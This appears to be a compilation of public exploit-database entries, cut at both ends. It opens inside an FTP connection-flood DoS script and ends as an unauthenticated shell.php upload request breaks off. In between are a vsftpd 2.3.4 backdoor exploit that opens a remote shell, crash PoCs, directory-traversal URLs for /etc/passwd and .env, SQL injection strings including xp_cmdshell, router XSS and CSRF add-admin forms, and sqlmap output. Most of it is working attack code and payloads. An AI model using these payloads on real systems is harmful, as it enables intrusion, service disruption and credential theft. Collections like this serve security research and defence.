except:
print usage
sys.exit()
try:
port = int(sys.argv[2])
except:
port = 21
try:
conns = int(sys.argv[3])
except:
conns = 50
print("[!] Testing if {0}:{1} is open".format(target, port))
test(target, port)
print("[+] Port {} open, starting attack...".format(port))
time.sleep(2)
print("[+] Attack started on {0}:{1}!".format(target, port))
# Starts timer() in a thread, then spawns conns+2 attack() threads per pass.
# NOTE(review): the inner `loop()` call passes no arguments although three are
# required, and `global start` is declared but never used here.
def loop(target, port, conns):
global start
threading.Thread(target=timer).start()
while 1:
for i in range(1, conns + 3):
t = threading.Thread(target=attack, args=(target,port,i,))
t.start()
if i > conns + 2:
t.join()
break
loop()
t = threading.Thread(target=loop, args=(target, port, conns,))
t.start()
# NOTE(review): `start` is a local here (no global declaration), and
# `start < time.time() + float(900)` is always true, so the else branch is
# never reached; the restart it attempts also passes two arguments to loop().
def timer():
start = time.time()
while 1:
if start < time.time() + float(900): pass
else:
subprocess.Popen("pkill ftp", shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
t = threading.Thread(target=loop, args=(target, port,))
t.start()
break
# Script entry; no __name__ guard, so importing the file also runs it.
main()
# Exploit Title: vsftpd 2.3.4 - Backdoor Command Execution
# Date: 9-04-2021
# Exploit Author: HerculesRD
# Software Link: http://www.linuxfromscratch.org/~thomasp/blfs-book-xsl/server/vsftpd.html
# Version: vsftpd 2.3.4
# Tested on: debian
# CVE : CVE-2011-2523
#!/usr/bin/python3
from telnetlib import Telnet
import argparse
from signal import signal, SIGINT
from sys import exit
def handler(signal_received, frame):
    """SIGINT handler: print an exit notice and terminate with status 0.

    Both parameters are supplied by the signal machinery and are not used.
    Raises SystemExit(0) via exit().
    """
    del signal_received, frame  # unused, provided by signal()
    notice = ' [+]Exiting...'
    print(notice)
    exit(0)
# Ctrl-C ends the script cleanly through handler().
signal(SIGINT, handler)
# Single positional argument: the host to connect to.
parser=argparse.ArgumentParser()
parser.add_argument("host", help="input the address of the vulnerable host", type=str)
args = parser.parse_args()
host = args.host
portFTP = 21 #if necessary edit this line
# The trojaned vsftpd 2.3.4 build (CVE-2011-2523) reacts to a USER value that
# contains ":)" by opening a listener on TCP 6200; the password is irrelevant.
# Defender note: that USER pattern and a new listener on 6200 are the
# observable indicators; a clean build of vsftpd does not have this behaviour.
user="USER nergal:)"
password="PASS pass"
tn=Telnet(host, portFTP)
tn.read_until(b"(vsFTPd 2.3.4)") #if necessary, edit this line
tn.write(user.encode('ascii') + b"\n")
tn.read_until(b"password.") #if necessary, edit this line
tn.write(password.encode('ascii') + b"\n")
# Second connection to the port the backdoor opened; interact() hands the
# socket to the terminal. NOTE(review): no error handling if 6200 is closed.
tn2=Telnet(host, 6200)
print('Success, shell opened')
print('Send `exit` to quit shell')
tn2.interact()
# Exploit Title: VSCO 1.1.1.0 - Denial of Service (PoC)
# Date: 2/14/2018
# Author: 0xB9
# Twitter: @0xB9Sec
# Contact: 0xB9[at]pm.me
# Software Link: https://www.microsoft.com/store/productId/9NC1RLNH76PB
# Version: 1.1.1.0
# Tested on: Windows 10
# Proof of Concept:
# Run the python script, it will create a new file "PoC.txt"
# Copy the text from the generated PoC.txt file to clipboard
# Paste the text in the top right search bar and hit Search
# Click back to Home
# App will now crash
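# Build the crash input (5000 'A' characters) and write it to PoC.txt in the
# current directory. Works under Python 2 and 3 (single-argument print).
buffer = "A" * 5000
payload = buffer
try:
    # the with-statement closes the file even if write() raises
    with open("PoC.txt", "w") as f:
        print("[+] Creating %s evil payload.." % len(payload))
        f.write(payload)
    print("[+] File created!")
except (IOError, OSError) as err:
    # report the cause instead of swallowing every exception type
    print("File cannot be created: %s" % err)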
# Exploit Title: VSAXESS V2.6.2.70 build20171226_053 - 'organization' Denial of Service (PoC)
# Discovery by: Diego Santamaria
# Discovery Date: 2018-11-05
# Vendor Homepage: https:https://www.visionistech.com/en/home/
# Software Link: https://www.visionistech.com/en/vsaxess-desktop-software/
# Tested Version: V2.6.2.70 build20171226_053
# Vulnerability Type: Denial of Service (DoS) Local
# Tested on OS: Windows 7 Professional
# Steps to Reproduce:
# 1. Run the python code organization.py
# 2. Open organization_exploit.txt and copy the content
# 3. Open VSAXESS.exe
# 4. Register a password and username
# 5. choose 'Control Panel'
# 6. choose 'Access Control'
# 7. choose 'Add'
# 8. Paste the content from organization_exploit.txt on 'Organization' and Crashed
#!/usr/bin/env python3
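# 10000 bytes of 'A' (0x41): the oversized value pasted into the Organization
# field. Written to organization_exploit.txt in the current directory.
content = "\x41" * 10000
# the with-statement guarantees the file is closed even if write() fails
with open("organization_exploit.txt", "w") as f:
    f.write(content)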
# Exploit Title: VSAXESS V2.6.2.70 build20171226_053 - 'Nickname' Denial of Service (PoC)
# Discovery by: Diego Santamaria
# Discovery Date: 2018-08-31
# Vendor Homepage: https:https://www.visionistech.com/en/home/
# Software Link: https://www.visionistech.com/en/vsaxess-desktop-software/
# Tested Version: V2.6.2.70 build20171226_053
# Vulnerability Type: Denial of Service (DoS) Local
# Tested on OS: Windows 7 Professional
# Steps to Reproduce:
# 1. Run the python code Nickname.py
# 2. Open nickname_exploit.txt and copy the content
# 3. Open VSAXESS.exe
# 4. Register a password and username
# 5. choose 'Add'
# 6. choose 'Serial Port'
# 6. Paste the content from nickname_exploit.txt on 'Nickname'
# 7. Press 'Aceptar' and Crashed
#!/usr/bin/env python
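# 9300 bytes of 'A' (0x41): the oversized value pasted into the Nickname field.
# Written to nickname_exploit.txt in the current directory.
content = "\x41" * 9300
# the with-statement guarantees the file is closed even if write() fails
with open("nickname_exploit.txt", "w") as f:
    f.write(content)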
# Exploit Title: VPN unlimited 6.1 - Unquoted Service Path
# Date: 2020-1-13
# Exploit Author: Amin Rawah
# Vendor Homepage: https://www.vpnunlimitedapp.com
# Version: 6.1
# Tested on: Windows 10 64bit
C:\Users\Amin>sc qc VPNUnlimitedService
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: VPNUnlimitedService
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files (x86)\VPN Unlimited\vpn-unlimited-daemon.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : VPN Unlimited Service
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
# Exploit Title: VPN Browser+ 1.1.0.0 - Denial of Service (PoC)
# Date: 1/18/2018
# Author: 0xB9
# Twitter: @0xB9Sec
# Contact: 0xB9[at]pm.me
# Software Link: https://www.microsoft.com/store/productId/9NFFFFS5Z2C7
# Version: 1.1.0.0
# Tested on: Windows 10
# Proof of Concept:
# Run the python script, it will create a new file "PoC.txt"
# Copy the text from the generated PoC.txt file to clipboard
# Paste the text in the search bar and click search
# App will now crash
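# Build the crash input (5800 'A' characters) and write it to PoC.txt in the
# current directory. Works under Python 2 and 3 (single-argument print).
buffer = "A" * 5800
payload = buffer
try:
    # the with-statement closes the file even if write() raises
    with open("PoC.txt", "w") as f:
        print("[+] Creating %s evil payload.." % len(payload))
        f.write(payload)
    print("[+] File created!")
except (IOError, OSError) as err:
    # report the cause instead of swallowing every exception type
    print("File cannot be created: %s" % err)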
Document Title:
===============
vPhoto-Album v4.2 iOS - File Include Web Vulnerability
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1477
Release Date:
=============
2015-05-05
Vulnerability Laboratory ID (VL-ID):
====================================
1477
Common Vulnerability Scoring System:
====================================
6.2
Product & Service Introduction:
===============================
vPhoto Pro is a powerful local album management app at your side that lets you easily manage your massive photo collection,
while giving you an unprecedented user experience. No in-app purchase, no functional limitations.
(Copy of the Homepage: https://itunes.apple.com/us/app/veryphoto-album-password-wifi/id720810114 )
Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research team discovered a local file include web vulnerability in the official vPhoto-Album v4.2 iOS mobile web-application.
Vulnerability Disclosure Timeline:
==================================
2015-05-05: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
Cheng Chen
Product: vPhoto-Album - iOS Web Application (Wifi) 4.1
Exploitation Technique:
=======================
Remote
Severity Level:
===============
High
Technical Details & Description:
================================
A local file include web vulnerability has been discovered in the official vPhoto-Album v4.2 iOS mobile web-application.
The local file include web vulnerability allows remote attackers to include unauthorized local file/path requests or
system-specific path commands to compromise the mobile web-application.
The vulnerability is located in the `name` value of the wifi interface module. Local attackers are able to manipulate the
wifi web interface by using the vulnerable sync function. The sync does not encode or parse the context of the album name.
Local attackers are able to manipulate the input of the folder path value to exploit the issue via the web-application sync.
The execution of unauthorized local file or path request occurs in the index file dir listing module of the wifi web-application.
The request method to inject is a sync and the attack vector is located on the application-side of the affected service.
The security risk of the local file include web vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 7.1.
Exploitation of the file include web vulnerability requires no user interaction or privileged web-application user account. Successful exploitation
of the local file include web vulnerability results in mobile application or connected device component compromise.
Vulnerable Method(s):
[+] [Sync]
Vulnerable Module(s):
[+] Albumname
Vulnerable Parameter(s):
[+] name
Affected Module(s):
[+] File Dir Index
Proof of Concept (PoC):
=======================
The local file include web vulnerability can be exploited by local attackers with restricted physical device access and no user interaction.
For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue.
PoC: http://localhost:8080/
<script type="text/javascript">
// Album grid of the vPhoto-Album wifi web interface, quoted verbatim from the
// vulnerable page.  getAllAlbum()/getNumberOfAlbums() are application helpers
// (not shown); each album object carries at least .name and .numberOfImage.
var albumArray = getAllAlbum();
var numberOfAlbums = getNumberOfAlbums();
// Four albums per table row: a row of cover images, then a row of captions.
for (var i=0; i<numberOfAlbums; i=i+4)
{
document.write("<tr>");
document.write("<td height=\"170\" width=\"150\">");
if (i+0 < numberOfAlbums)
{
// Cover image: the whole album object is serialised into the query string.
// encodeURI() keeps it inside the src attribute; the onclick argument is the
// loop index only, so neither is attacker-controlled here.
document.write("<p align=\"center\"><img border=\"0\" src=\"getCoverImage?"+encodeURI(JSON.stringify(albumArray[i+0]))+"\" width=\"170\" height=\"150\" onclick=albumClick('"+(i+0)+"')>");
}
document.write("</td>");
document.write("<td height=\"170\" width=\"50\"></td>");
document.write("<td height=\"170\" width=\"150\">");
if (i+1 < numberOfAlbums)
{
document.write("<p align=\"center\"><img border=\"0\" src=\"getCoverImage?"+encodeURI(JSON.stringify(albumArray[i+1]))+"\" width=\"170\" height=\"150\" onclick=albumClick('"+(i+1)+"')>");
}
document.write("</td>");
document.write("<td height=\"170\" width=\"50\"></td>");
document.write("<td height=\"170\" width=\"150\">");
if (i+2 < numberOfAlbums)
{
document.write("<p align=\"center\"><img border=\"0\" src=\"getCoverImage?"+encodeURI(JSON.stringify(albumArray[i+2]))+"\" width=\"170\" height=\"150\" onclick=albumClick('"+(i+2)+"')>");
}
document.write("</td>");
document.write("<td height=\"170\" width=\"50\"></td>");
document.write("<td height=\"170\" width=\"150\">");
if (i+3 < numberOfAlbums)
{
document.write("<p align=\"center\"><img border=\"0\" src=\"getCoverImage?"+encodeURI(JSON.stringify(albumArray[i+3]))+"\" width=\"170\" height=\"150\" onclick=albumClick('"+(i+3)+"')>");
}
document.write("</td>");
document.write("</tr>");
document.write("<tr>");
document.write("<td height=\"20\" > <p align=\"center\">");
if (i+0 < numberOfAlbums)
{
document.write("<font face=\"Courier New\" size=\"2\">");
// Caption: the album name is written as raw HTML with no escaping.  This is
// the injection sink — in the rendered output below, a name containing
// '"><...>' lands verbatim inside the <font> element.  An HTML-escaping
// step (or a text node via createTextNode) before document.write would close it.
document.write(albumArray[i+0].name+"("+albumArray[i+0].numberOfImage+")");
document.write("</font>");
}
document.write("</td>");
document.write("<td height=\"20\" width=\"50\"></td>");
document.write("<td height=\"20\" > <p align=\"center\">");
if (i+1 < numberOfAlbums)
{
document.write("<font face=\"Courier New\" size=\"2\">");
// Same unescaped sink as above.
document.write(albumArray[i+1].name+"("+albumArray[i+1].numberOfImage+")");
document.write("</font>");
}
document.write("</td>");
document.write("<td height=\"20\" width=\"50\"></td>");
document.write("<td height=\"20\" > <p align=\"center\">");
if (i+2 < numberOfAlbums)
{
document.write("<font face=\"Courier New\" size=\"2\">");
// Same unescaped sink as above.
document.write(albumArray[i+2].name+"("+albumArray[i+2].numberOfImage+")");
document.write("</font>");
}
document.write("</td>");
document.write("<td height=\"20\" width=\"50\"></td>");
document.write("<td height=\"20\" > <p align=\"center\">");
if (i+3 < numberOfAlbums)
{
document.write("<font face=\"Courier New\" size=\"2\">");
// Same unescaped sink as above.
document.write(albumArray[i+3].name+"("+albumArray[i+3].numberOfImage+")");
document.write("</font>");
}
document.write("</td>");
document.write("</tr>");
document.write("<tr>");
// Spacer row between album groups.
document.write("<td height=\"20\" colspan=\"7\">"); document.write("</td>");
document.write("</tr>");
}
</script>
<tr><td height="170" width="150"><p align="center"><img src="getCoverImage?%7B%22name%22:%22%5C%22%3E%3C[FILE INCLUDE VULNERABILITY!]%3E%22,%22type%22:%222%22,%22groupType%22:2,%22url%22:%22assets-library://group/?id=B94CC6C9-FB2C-4BFD-8BA4-0925E51146A1&filter=1537%22,%22numberOfImage%22:%222%22%7D" onclick="albumClick('0')" border="0" height="150" width="170"></p></td><td height="170" width="50"></td><td height="170" width="150"><p align="center"><img src="getCoverImage?%7B%22name%22:%22Camera%20Roll%22,%22type%22:%222%22,%22groupType%22:16,%22url%22:%22assets-library://group/?id=70169F06-36C7-430C-AA4F-55B95E268426%22,%22numberOfImage%22:%222%22%7D" onclick="albumClick('1')" border="0" height="150" width="170"></p></td><td height="170" width="50"></td><td height="170" width="150"></td><td height="170" width="50"></td><td height="170" width="150"></td></tr><tr><td height="20"> <p align="center"><font face="Courier New" size="2">"><C[FILE INCLUDE VULNERABILITY!]>(2)</font></td><td height="20" width="50"></td><td height="20" > <p align="center"><font face="Courier New" size="2">Camera Roll(2)</font></td><td height="20" width="50"></td><td height="20" > <p align="center"></td><td height="20" width="50"></td><td height="20" > <p align="center"></td></tr><tr><td height="20" colspan="7"></td></tr>
</table>
</div>
</body>
</html></iframe></font></p></td></tr></tbody>
Reference(s):
http://localhost:8080/
Security Risk:
==============
The security risk of the local file include web vulnerability in the album values is estimated as high. (CVSS 6.2)
Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Katharin S. L. (CH) (research@vulnerability-lab.com) [www.vulnerability-lab.com]
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed
or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable
in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab
or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for
consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses,
policies, deface websites, hack into databases or trade with fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact
(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.
Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]™
--
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com
PGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt
# Exploit Title: Voyager 1.3.0 - Directory Traversal
# Google Dork: N/A
# Date: 2020-01-06
# Exploit Author: NgoAnhDuc
# Vendor Homepage: https://voyager.devdojo.com/
# Software Link: https://github.com/the-control-group/voyager/releases/tag/v1.3.0 (also https://github.com/the-control-group/voyager/releases/tag/v1.2.7)
# Version: 1.3.0 and below
# Tested on: Ubuntu 18.04
# CVE : N/A
Vulnerable code is in voyager/src/Http/Controllers/VoyagerController.php
========================================
/**
 * Serves a file from the package's publishable asset directory, selected by
 * the user-supplied `path` query parameter (quoted from the vulnerable
 * VoyagerController).  The stray '*' characters on the two lines below are
 * emphasis markers left over from the original advisory text, not PHP.
 */
public function assets(Request $request)
{
// Sanitisation is a single, non-recursive str_replace() of '../' and './'.
// Because nothing re-checks the result, a segment such as '.....///' loses
// one '../' and then one './' and collapses to '../', so traversal survives
// (this is what the '.....%2F%2F%2F' segments in the PoC below rely on).
*$path = str_start(str_replace(['../', './'], '',
urldecode($request->path)), '/');*
// The path is appended to the asset root with no check that the resolved
// file still lies inside it.  A fix would realpath() the result and reject
// it unless it starts with the realpath() of the asset directory.
* $path = base_path('vendor/tcg/voyager/publishable/assets'.$path);*
if (File::exists($path)) {
$mime = '';
// Content-Type is chosen from the extension for JS/CSS, else sniffed.
if (ends_with($path, '.js')) {
$mime = 'text/javascript';
} elseif (ends_with($path, '.css')) {
$mime = 'text/css';
} else {
$mime = File::mimeType($path);
}
// File contents are returned to the caller (the disclosure itself).
$response = response(File::get($path), 200,
['Content-Type' => $mime]);
$response->setSharedMaxAge(31536000);
$response->setMaxAge(31536000);
$response->setExpires(new \DateTime('+1 year'));
return $response;
}
return response('', 404);
}
========================================
PoC:
The filter is bypassed because str_replace() runs once per search string: '.....///' loses one '../' and then one './', leaving '../'. Each URL-encoded '.....%2F%2F%2F' segment therefore climbs one directory.
/etc/passwd:
http://localhost/admin/voyager-assets?path=.....%2F%2F%2F.....%2F%2F%2F.....%2F%2F%2F.....%2F%2F%2F.....%2F%2F%2F.....%2F%2F%2F.....%2F%2F%2F.....%2F%2F%2F.....%2F%2F%2Fetc/passwd
Laravel environment file (.env):
http://localhost/admin/voyager-assets?path=.....%2F%2F%2F.....%2F%2F%2F.....%2F%2F%2F.....%2F%2F%2F.....%2F%2F%2F.....%2F%2F%2F.....%2F%2F%2F.....%2F%2F%2F.....%2F%2F%2F<web root dir>/.env
source: https://www.securityfocus.com/bid/52081/info
VOXTRONIC Voxlog Professional is prone to a file-disclosure vulnerability and multiple SQL-injection vulnerabilities because it fails to properly sanitize user-supplied input.
A remote attacker can exploit these issues to obtain potentially sensitive information from local files on computers running the vulnerable application, or modify the logic of SQL queries. A successful exploit may allow the attacker to compromise the software, retrieve information, or modify data; these may aid in further attacks.
VOXTRONIC Voxlog Professional 3.7.2.729 and 3.7.0.633 are vulnerable; other versions may also be affected.
http://www.example.com/voxlog/sysstat/userlogdetail.php?load=1&idclient[1]=xxx);waitfor delay '0:0:5' --+
http://www.example.com/voxlog/sysstat/userlogdetail.php?load=1&idclient[1]=xxx);exec master..xp_cmdshell 'xxxxx' --+
source: https://www.securityfocus.com/bid/52081/info
VOXTRONIC Voxlog Professional is prone to a file-disclosure vulnerability and multiple SQL-injection vulnerabilities because it fails to properly sanitize user-supplied input.
A remote attacker can exploit these issues to obtain potentially sensitive information from local files on computers running the vulnerable application, or modify the logic of SQL queries. A successful exploit may allow the attacker to compromise the software, retrieve information, or modify data; these may aid in further attacks.
VOXTRONIC Voxlog Professional 3.7.2.729 and 3.7.0.633 are vulnerable; other versions may also be affected.
http://www.example.com/voxlog/GET.PHP?v=ZmlsZT1DOi9ib290LmluaQ==  (the v parameter is base64 for `file=C:/boot.ini`; substitute any readable path)
# Title: Vox TG790 ADSL Router - Cross-Site Scripting
# Author: Cakes
# Exploit Date: 2018-08-01
# Vendor: Vox Telecom
# Link: https://www.vox.co.za/
# Firmware Version: 6.2.W.1
# CVE: N/A
# Description
# Due to improper user input management low privilege users are able to create
# a persistent Cross-Site scripting attack via the phone book function.
# PoC
POST /cgi/b/_voip_/phonebook/?be=0&l0=2&l1=1&name= HTTP/1.1
Host: 192.168.1.254
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Referer: https://192.168.1.254/cgi/b/_voip_/pb/?be=0&l0=2&l1=1&name=
Authorization: Digest username="cakes", realm="SpeedTouch", nonce="0745EHNLF:00-1D-68-52-6C-37:173934:292999", uri="/cgi/b/_voip_/phonebook/?be=0&l0=2&l1=1&name=", response="ab09b54d4b6369496463eb79cfb4b1c2", qop=auth, nc=0000002a, cnonce="8305e26a71dd0ae2"
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 141
0=10&1=&100=Cakes&101=Cakes&102=123123&103=123123123&104=123123&105=123123&106=<script>alert("TESTER");</script>
# Response
HTTP/1.0 200 OK
Cache-Control: no-cache
Expires: -1
Content-Type: text/html
# Title: Vox TG790 ADSL Router - Cross-Site Request Forgery (Add Admin)
# Author: Cakes
# Exploit Date: 2018-08-01
# Vendor: Vox Telecom
# Link: https://www.vox.co.za/
# Firmware Version: 6.2.W.1
# CVE: N/A
# Description
# Due to improper session management low privilege users are able to create
# administrator accounts through a crafted POST request.
# PoC
<html>
<form action="https://TARGET/cgi/b/users/cfg/usraccedit/?be=0&l0=2&l1=9&tid=ADD_USER" method="POST">
<input type="hidden" name="0" id="0" value="10">
<input type="hidden" name="1" id="1" value="usrAccApply">
<input type="hidden" name="34" id="34" value="LulzCakes">
<input type="hidden" name="36" id="36" value="1">
<input type="text" name="33" id="33" placeholder="Account Name">
<br />
<input type="text" name="31" id="31" value="Administrator">
<br />
<input type="submit" value="W00ts">
</form>
</html>
# Exploit Title: VOX Music Player 2.8.8 '.pls' Local Crash PoC
# Date: 10-12-2016
# Exploit Author: Antonio Z.
# Vendor Homepage: http://coppertino.com/vox/mac/
# Software Link: http://dl.devmate.com/com.coppertino.Vox/Vox.dmg
# Version: 2.8.8
# Tested on: OS X 10.10, OS X 10.11, OS X 10.12
import os
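# Single non-ASCII byte appended to the File1 entry; this malformed playlist
# is what the advisory reports as crashing VOX 2.8.8 when opened.
evil = b'\x90'
# Build the .pls as bytes so the file is written byte-for-byte identically on
# Python 2 and 3 (the original str + 'wb' combination raises TypeError on 3).
pls = (b'[playlist]\n'
       + b'NumberOfEntries=1\n'
       + b'File1' + evil + b'\n'
       + b'Title1=\n'
       + b'Length1=-1\n')
# Context manager closes the handle even if the write fails.
with open('Local_Crash_PoC.pls', 'wb') as poc:
    poc.write(pls)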
# Exploit Title: Voting System 1.0 - Time based SQLI (Unauthenticated SQL injection)
# Date: 02/05/2021
# Exploit Author: Syed Sheeraz Ali
# Vendor Homepage: https://www.sourcecodester.com/php/12306/voting-system-using-php.html
# Software Link: https://www.sourcecodester.com/download-code?nid=12306&title=Voting+System+using+PHP%2FMySQLi+with+Source+Code
# Version: 1.0
# Tested on: Windows 10 20H2 + XAMPP v3.2.4
Log in as a voter, capture the login request in Burp and pass it to sqlmap; the injectable parameter is `voter`.
Vulnerable code
```
Path :- /votersystem/login.php
<?php
// Voter login handler quoted from the vulnerable application.  The '<-'
// annotations are the advisory author's and are not part of the PHP.
session_start();
include 'includes/conn.php';
if(isset($_POST['login'])){
$voter = $_POST['voter']; <- vulnerable parameter
$password = $_POST['password'];
// $voter is concatenated straight into the query with no escaping or
// binding; the sqlmap run below confirms a time-based blind injection.
// Fix: $conn->prepare('SELECT * FROM voters WHERE voters_id = ?') and
// bind_param('s', $voter).
$sql = "SELECT * FROM voters WHERE voters_id = '$voter'"; <-
Passed unsanitized input
$query = $conn->query($sql);
if($query->num_rows < 1){
$_SESSION['error'] = 'Cannot find voter with the ID';
}
else{
$row = $query->fetch_assoc();
// The hashed password compare is sound, but the injection is reached
// before it, so no valid credentials are needed.
if(password_verify($password, $row['password'])){
$_SESSION['voter'] = $row['id'];
}
else{
$_SESSION['error'] = 'Incorrect password';
}
}
}
else{
$_SESSION['error'] = 'Input voter credentials first';
}
// Always redirects; errors surface only via the session, which is consistent
// with sqlmap finding only a time-based vector.
header('location: index.php');
?>
```
Request
```
POST /login.php HTTP/1.1
Host: 10.129.139.200
Content-Length: 27
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://10.129.139.200
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-GPC: 1
Referer: http://10.129.139.200/
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Cookie: PHPSESSID=vuukl0gemht1iiq7lmptu7npoe
Connection: close
voter=as&password=as&login=
```
Sqlmap output
```
python3 sqlmap.py --dbms=mysql --batch --level=1 --risk=3 -r /Users/sheerazali/Documents/wpcve/voter.req -p voter
___
__H__
___ ___[)]_____ ___ ___ {1.5.4.7#dev}
|_ -| . [(] | .'| . |
|___|_ ["]_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior
mutual consent is illegal. It is the end user's responsibility to obey all
applicable local, state and federal laws. Developers assume no liability
and are not responsible for any misuse or damage caused by this program
[*] starting @ 07:50:56 /2021-05-02/
[07:50:56] [INFO] parsing HTTP request from
'/Users/sheerazali/Documents/wpcve/voter.req'
[07:50:57] [INFO] testing connection to the target URL
got a 302 redirect to 'http://10.129.139.200:80/index.php'. Do you want to follow? [Y/n] Y
redirect is a result of a POST request. Do you want to resend original POST data to a new location? [Y/n] Y
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: voter (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: voter=as' AND (SELECT 2487 FROM (SELECT(SLEEP(5)))WYpt) AND 'hBVQ'='hBVQ&password=as&login=
---
[07:50:57] [INFO] testing MySQL
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] Y
[07:51:08] [INFO] confirming MySQL
[07:51:08] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
[07:51:19] [INFO] adjusting time delay to 1 second due to good response times
[07:51:19] [INFO] the back-end DBMS is MySQL
web application technology: PHP 7.3.27, Apache 2.4.46
back-end DBMS: MySQL >= 5.0.0 (MariaDB fork)
[07:51:19] [INFO] fetched data logged to text files under '/Users/sheerazali/.local/share/sqlmap/output/10.129.139.200'
[*] ending @ 07:51:19 /2021-05-02/
```
# Exploit Title: Voting System 1.0 - Remote Code Execution (Unauthenticated)
# Date: 07/05/2021
# Exploit Author: secure77
# Vendor Homepage: https://www.sourcecodester.com/php/12306/voting-system-using-php.html
# Software Link: https://www.sourcecodester.com/download-code?nid=12306&title=Voting+System+using+PHP%2FMySQLi+with+Source+Code
# Version: 1.0
# Tested on: Linux Debian 5.10.28-1kali1 (2021-04-12) x86_64 // PHP Version 7.4.15 & Built-in HTTP server // mysql Ver 15.1 Distrib 10.5.9-MariaDB
Unauthenticated file upload is possible via /admin/candidates_add.php, which can be used for RCE.
Your upload will be stored at /images/ and is also accessible without authentication.
########################### Vulnerable code ############################
<?php
// Candidate-add handler quoted from the vulnerable application.
// includes/session.php is not shown; the advisory states the endpoint is
// reachable unauthenticated, so presumably it does not enforce a login — verify.
include 'includes/session.php';
if(isset($_POST['add'])){
$firstname = $_POST['firstname'];
$lastname = $_POST['lastname'];
$position = $_POST['position'];
$platform = $_POST['platform'];
// The client-supplied filename, extension included, is trusted as-is.
$filename = $_FILES['photo']['name'];
if(!empty($filename)){
// No extension/MIME allow-list, no server-side renaming, and the target is
// the web-served ../images/ directory, so shell.php from the request below
// becomes reachable at /images/shell.php.  Fix: generate the stored name,
// allow-list image extensions and ideally store outside the webroot.
move_uploaded_file($_FILES['photo']['tmp_name'], '../images/'.$filename);
}
// Form fields are also interpolated into the INSERT unescaped — a separate
// injection sink in the same handler; use a prepared statement.
$sql = "INSERT INTO candidates (position_id, firstname, lastname, photo, platform) VALUES ('$position', '$firstname', '$lastname', '$filename', '$platform')";
if($conn->query($sql)){
$_SESSION['success'] = 'Candidate added successfully';
}
else{
$_SESSION['error'] = $conn->error;
}
}
else{
$_SESSION['error'] = 'Fill up add form first';
}
header('location: candidates.php');
?>
########################### Payload ############################
POST /admin/candidates_add.php HTTP/1.1
Host: 192.168.1.1
Content-Length: 275
Cache-Control: max-age=0
Origin: http://192.168.1.1
Upgrade-Insecure-Requests: 1
DNT: 1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryrmynB2CmGO6vwFpO
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.1.1/admin/candidates.php
Accept-Encoding: gzip, deflate
Accept-Language: de-DE,de;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close
------WebKitFormBoundaryrmynB2CmGO6vwFpO
Content-Disposition: form-data; name="photo"; filename="shell.php"
